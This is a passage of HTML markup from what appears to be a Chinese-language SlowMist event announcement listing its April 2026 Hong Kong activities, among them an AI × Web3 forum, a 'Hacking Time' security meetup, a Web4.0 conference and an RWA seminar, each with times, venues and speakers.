textstyle="" style="font-weight: normal;">活动期间，我们特别设置现场互动抽奖环节，奖品包括慢雾定制 T 恤、黑手册与笔记本、帆布袋以及定制贴纸等多种周边。欢迎大家莅临展位与我们交流互动，在现场解锁专属慢雾纪念周边！</span></span></b></b></b></p><p dir="ltr" style="line-height:1.38;text-align: center;margin-top:12pt;margin-bottom:12pt;"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span style="white-space:pre-wrap;font-size:13pt;font-family:Roboto,sans-serif;color:#000000;background-color:transparent;font-weight:300;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="border:none;display:inline-block;overflow:hidden;width:307px;height:410px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.3333333333333333" data-type="jpeg" data-w="1200" height="410" style="margin-left:0px;margin-top:0px;" width="307" data-imgfileid="100021004" src="https://wechat2rss.xlab.app/img-proxy/?k=7f35e069&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLe9UfIH0kWv6mh9jjR5QodicWicxJbHq422QqfkLLlpCZU3c5unglBH14Opkx0yGnRV0pOlLnXNX7ibdj77LoDSECBZZwibficCD98%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></span></b></b></b></p></div><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h2 dir="ltr" style="line-height:1.38;background-color:#ffffff;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:16pt;font-family:Roboto,sans-serif;color:#000000;background-color:transparent;font-weight:300;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><span textstyle="" style="font-size: 20px;font-weight: bold;">主会场活动</span></span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 20 日下午，会场一 ·「风」主题舞台将举办“Web3 × AI：智能时代的价值重构”主题论坛。围绕 AI 与 Web3 的融合趋势，该论坛将从技术演进、产业实践与安全协同等多个维度展开深入讨论。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">时间：</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 20 日  14:00 - 17:00</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">地点：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">香港会展中心 5 楼 BCDE</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021008" data-ratio="0.562962962962963" width="525" data-type="png" data-w="1080" height="296" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=54d3ebc4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCK9wP6zuB24BBYYwDiahUBXUhB2zl2AB89qQicGyqCYujvocmsX3YCF4nkGy9xb9NfGicJBTcFQ8aL0HKBMM9d1NlbqL6KgrGibW0k%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在“AI 真的需要 Web3 吗？”圆桌环节中，慢雾(SlowMist) 合伙人 &amp; CPO —— Keywolf 将与来自产业与技术一线的嘉宾共同参与讨论，从数据隐私、算力去中心化到价值确权等关键问题出发，探讨 AI 与 Web3 从“技术叠加”走向“价值共生”的现实路径，并结合慢雾在安全领域的实践经验，分享 AI 时代下 Web3 安全面临的新挑战与应对思路。</span></span></p></b></b></b></b></p><div><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h2 dir="ltr" style="line-height: 1.38;background-color: rgb(255, 255, 255);margin-top: 0pt;margin-bottom: 0pt;"><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 24px;font-weight: bold;">Hacking Time</span></span></p></b></p></h2></b></b><div data-pm-slice="4 4 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">作为本次嘉年华的重要环节，慢雾(SlowMist) 将于 4 月 21 日 14:00 – 17:00 在蔡氏大厦举办主题为「Hacking Time: Security for AI &amp; Crypto, AI for Security」的安全活动。在 AI 与加密技术加速融合的背景下，安全问题正在从单点漏洞防护演进为跨系统、多维度的复杂风险治理。本次活动将围绕新型攻击面演化、安全与合规协同机制，以及真实攻防场景下的防御策略展开讨论，通过主题分享与圆桌交流，探讨 AI × Web3 语境下安全能力的演进方向与实践路径。</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">时间：</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 21 日  14:00 - 17:00</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">地点：</span><span textstyle="" style="font-weight: normal;">蔡氏大厦 1F CAI CAFE</span></span></b></p></div></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5625" data-s="300,640" data-type="png" data-w="1920" style="width: 519px;height: 292px;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/8z8bibAexaCIfwTOAII0duARH3Jy9VvoqRwEE4ibGvCeN4nsRWSbsWZl0ng8biabicsZ9rPRSWHgPc4MHsDvDqq4icWpIQvSOLE4QJ7lb772iaatM/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="519" data-cropsely2="292" data-imgfileid="100021061" src="https://wechat2rss.xlab.app/img-proxy/?k=c801040d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIfwTOAII0duARH3Jy9VvoqRwEE4ibGvCeN4nsRWSbsWZl0ng8biabicsZ9rPRSWHgPc4MHsDvDqq4icWpIQvSOLE4QJ7lb772iaatM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本次活动将邀请多位来自慢雾及行业一线的安全专家与外部嘉宾共同参与分享。其中，慢雾业务安全负责人 Thinking 将围绕安全能力的体系化演进展开探讨；慢雾合约安全审计负责人 Kong 将分享 AI 在 Web3 安全攻防中的实践应用；慢雾合伙人 &amp; CPO —— </span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Keywolf 将聚焦 AI 时代下的反洗钱与合规挑战。此外，行业知名技术专家 SEEM 将从工程实现角度解析 Claude Code 的系统设计与安全意义，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RC² TSCM 实验室和 BUGPWN TSCM 黑盒挑战赛的创始人 Chris </span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Yang 则将结合实际案例探讨 Web3 从业者面临的隐私保护与现实风险问题。最后，圆桌讨论将围绕“香港 Web3 发展：AI 和稳定币谁将成为未来关键驱动力”展开，由慢雾香港社区负责人 Tony Tan 主持，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">来自 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RigSec、</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">FinTax、Safeheron、OneKey 以及君合律师事务所的嘉宾将共同参与，从技术、产业与合规等角度展开交流与讨论。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">首届全球 Web4.0 大会：AI+数字资产的创新与融合</span></span></b></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">时间：</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 22 日  10:00 - 18:00</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">地点：</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">香港数码港 CyberArena</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">报名链接：</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><a href="https://luma.com/9h0pok5y" target="_blank">https://luma.com/9h0pok5y</a></span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021007" data-ratio="0.562962962962963" width="513" data-type="jpeg" data-w="1080" height="289" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=2616fe5b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCKZoGhRlNS3tlDlot8uNic40hkPZ5cz63OKJs4h9xMomys6SCEQYTribf0thmUibicnCq4w9XIrPHORJPnl07AqQlyNiaicHP5ShRekg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 22 日，首届全球 Web4.0 大会将于香港数码港 CyberArena 举办。本次大会由华赢集团(AlloyX Group) 主办、ME Group 联合主办，围绕“AI + 数字资产的创新与融合”展开，聚焦 Web4.0 时代“主动智能型网络”的发展方向。来自产业、学界与监管侧的多方参与者将在此交汇，共同探讨 AI 与数字资产融合所带来的全新商业范式与价值流转方式。慢雾(SlowMist) 合伙人 &amp; CPO —— Keywolf 将参与圆桌讨论，与现场嘉宾共同交流对下一代互联网生态的前瞻判断。</span></span></b></p><b data-pm-slice="6 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">链接全球，香港 RWA 基建生态研讨会暨 RWA Connect 2026 启动会</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">时间：</span></span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 22 日  10:00 - 12:00</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">地点：</span></span></span><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">香港中环干诺道中 1 号友邦金融中心 7 楼</span></span></span></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;" nodeleaf=""><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100021025" data-ratio="0.562962962962963" data-s="300,640" type="block" data-type="jpeg" data-w="1080" style="width:555px;height:312px;" src="https://wechat2rss.xlab.app/img-proxy/?k=d2a51f5d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCKtxgGwOlHNbiapedHlLfynuIArnuV4YPH5U24YpP3MiaTkIfGQHUMHMe1nIDDqBkwGZCAWJDKrtbGNlprlDjcDdcltzXd2ctiaoU%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><b style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 22 日，由星路、星链、复星财富控股联合 ME Group 共同主办的「链接全球，香港 RWA 基建生态研讨会暨 RWA Connect 2026 启动会」将于香港中环友邦金融中心举办。本次闭门研讨会将围绕 RWA 基建、生态协同、合规安全体系等议题，汇聚金融机构、家族办公室及技术服务商等核心决策者，共促全球 RWA 资源链接与落地。慢雾(SlowMist) VP 孙熹将受邀出席圆桌论坛，围绕“合规与安全：RWA 如何打造可信生态”这一主题，与来自托管、审计及安全领域的代表展开深入交流，共同探讨 RWA 生态的风险防控与合规体系建设。</span></span></b></b><h1 dir="ltr" style="line-height: 1.38;margin-top: 20pt;margin-bottom: 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;font-weight: bold;">期待相见</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从 Web3 Festival 2026 到 Hacking Time，从 AI × Web3 圆桌到 Web4.0 峰会，慢雾(SlowMist) 将在香港呈现一场围绕“安全”的深度交流之旅。随着 AI 与 Web3 </span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">的持续融合，行业正进入一个更加复杂且关键的发展阶段，我们期待与全球 Web3 从业者在香港相见</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: 